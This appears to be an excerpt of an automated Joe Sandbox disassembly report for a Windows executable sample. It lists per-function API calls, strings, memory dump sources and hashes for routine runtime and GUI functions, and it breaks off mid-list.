                                                                          • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                          • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                          • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                          • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                          Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                          • _fseek.LIBCMT ref: 00452B3B
                                                                          • __wsplitpath.LIBCMT ref: 00452B9B
                                                                          • _wcscpy.LIBCMT ref: 00452BB0
                                                                          • _wcscat.LIBCMT ref: 00452BC5
                                                                          • __wsplitpath.LIBCMT ref: 00452BEF
                                                                          • _wcscat.LIBCMT ref: 00452C07
                                                                          • _wcscat.LIBCMT ref: 00452C1C
                                                                          • __fread_nolock.LIBCMT ref: 00452C53
                                                                          • __fread_nolock.LIBCMT ref: 00452C64
                                                                          • __fread_nolock.LIBCMT ref: 00452C83
                                                                          • __fread_nolock.LIBCMT ref: 00452C94
                                                                          • __fread_nolock.LIBCMT ref: 00452CB5
                                                                          • __fread_nolock.LIBCMT ref: 00452CC6
                                                                          • __fread_nolock.LIBCMT ref: 00452CD7
                                                                          • __fread_nolock.LIBCMT ref: 00452CE8
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                          • __fread_nolock.LIBCMT ref: 00452D78
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                          • String ID:
                                                                          • API String ID: 2054058615-0
                                                                          • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                          • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                          • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                          • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                          Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window
                                                                          • String ID: 0
                                                                          • API String ID: 2353593579-4108050209
                                                                          • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                          • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                          • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                          • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                          Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                          • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                          • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                          • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                          • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                          • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                          • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                          • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                          • GetSysColor.USER32(00000008), ref: 0044A265
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                          • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                          • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                          • String ID:
                                                                          • API String ID: 1744303182-0
                                                                          • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                          • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                          • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                          • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                          Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                          • __mtterm.LIBCMT ref: 00417C34
                                                                            • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                            • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                          • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                          • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                          • __init_pointers.LIBCMT ref: 00417CE6
                                                                          • __calloc_crt.LIBCMT ref: 00417D54
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                          • API String ID: 4163708885-3819984048
                                                                          • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                          • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                          • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                          • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                          Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$IconLoad
                                                                          • String ID: blank$info$question$stop$warning
                                                                          • API String ID: 2485277191-404129466
                                                                          • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                          • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                          • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                          • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                          Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                          • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                          • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                          • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                          • GetDesktopWindow.USER32 ref: 0045476F
                                                                          • GetWindowRect.USER32(00000000), ref: 00454776
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                          • GetClientRect.USER32(?,?), ref: 004547D2
                                                                          • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                          • String ID:
                                                                          • API String ID: 3869813825-0
                                                                          • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                          • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                          • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                          • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                          Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00464B28
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                          • _wcslen.LIBCMT ref: 00464C28
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                          • _wcslen.LIBCMT ref: 00464CBA
                                                                          • _wcslen.LIBCMT ref: 00464CD0
                                                                          • _wcslen.LIBCMT ref: 00464CEF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$Directory$CurrentSystem
                                                                          • String ID: D
                                                                          • API String ID: 1914653954-2746444292
                                                                          • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                          • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                          • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                          • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                          Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcsncpy.LIBCMT ref: 0045CE39
                                                                          • __wsplitpath.LIBCMT ref: 0045CE78
                                                                          • _wcscat.LIBCMT ref: 0045CE8B
                                                                          • _wcscat.LIBCMT ref: 0045CE9E
                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                          • _wcscpy.LIBCMT ref: 0045CF61
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                          • String ID: *.*
                                                                          • API String ID: 1153243558-438819550
                                                                          • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                          • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                          • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                          • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                          Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll
                                                                          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                          • API String ID: 3832890014-4202584635
                                                                          • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                          • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                          • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                          • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                          Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                          • GetFocus.USER32 ref: 0046A0DD
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$CtrlFocus
                                                                          • String ID: 0
                                                                          • API String ID: 1534620443-4108050209
                                                                          • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                          • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                          • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                          • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                          Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(?), ref: 004558E3
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateDestroy
                                                                          • String ID: ,$tooltips_class32
                                                                          • API String ID: 1109047481-3856767331
                                                                          • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                          • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                          • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                          • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                          Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                          • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                          • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                          • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                          • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
